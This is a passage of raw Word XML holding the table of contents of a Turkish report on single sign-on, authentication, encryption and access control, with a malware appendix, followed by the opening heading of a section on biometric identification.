            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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0" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2. Tekli Oturum Açma Nedir: Başlangıç</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979190 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</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1" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3. Temel Sorun</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979191 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</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2" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4. Mekanizmalar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979192 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</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3" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5. Tekli Oturum Açma Ne Sağlar?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979193 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</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4" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6. Dahili Yetenek Vakfı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979194 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</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5" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7. Genel Özellikleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979195 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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6" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.8.Son Kullanıcı Yönetim Tesisleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979196 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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7" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.9. Uygulama Yönetimi Olanakları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979197 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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8" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.10. Uç Nokta Yönetim Olanakları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979198 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9979199" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.11. Mobil Kullanıcılar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979199 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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0" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.12.</w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Doğrulama</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979200 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</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1" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.13.Şifreleme</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979201 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3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2" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.14. Giriş Kontrolü</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979202 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</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3" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.15.Uygulama Kontrolü</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979203 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</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4" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.16  Yönetim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979204 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</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5" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.17. Masaüstü Duyarlı Uygulamalar için Hizmetler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979205 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</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6" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.18. Güvenilirlik ve Performans</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979206 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</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7" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.19. Gereksinimler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979207 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</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8" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.20. Hedefler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979208 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</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09" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.21. İşlevsel gereksinimler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979209 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3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10" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Ek Konu : Kötü amaçlı yazılım saldırısı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979210 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3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11" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:hAnsi="Trebuchet MS"/>
                <w:noProof/>
                <w:kern w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kötü Amaçlı Araçlar Sizi Nasıl Etkileyebilir?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979211 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</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12" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.Kötü Amaçlı Araçlara Karşı Korunma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979212 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9979213" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Kaynakça</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979213 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A80923" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc9978676"/>
      <w:bookmarkStart w:id="1" w:name="_Toc9979158"/>
      <w:r w:rsidRPr="00A80923">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80923">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80923">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Biyometrik Tanımlama</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Donald R. Richards</w:t>
      </w:r>
    </w:p>
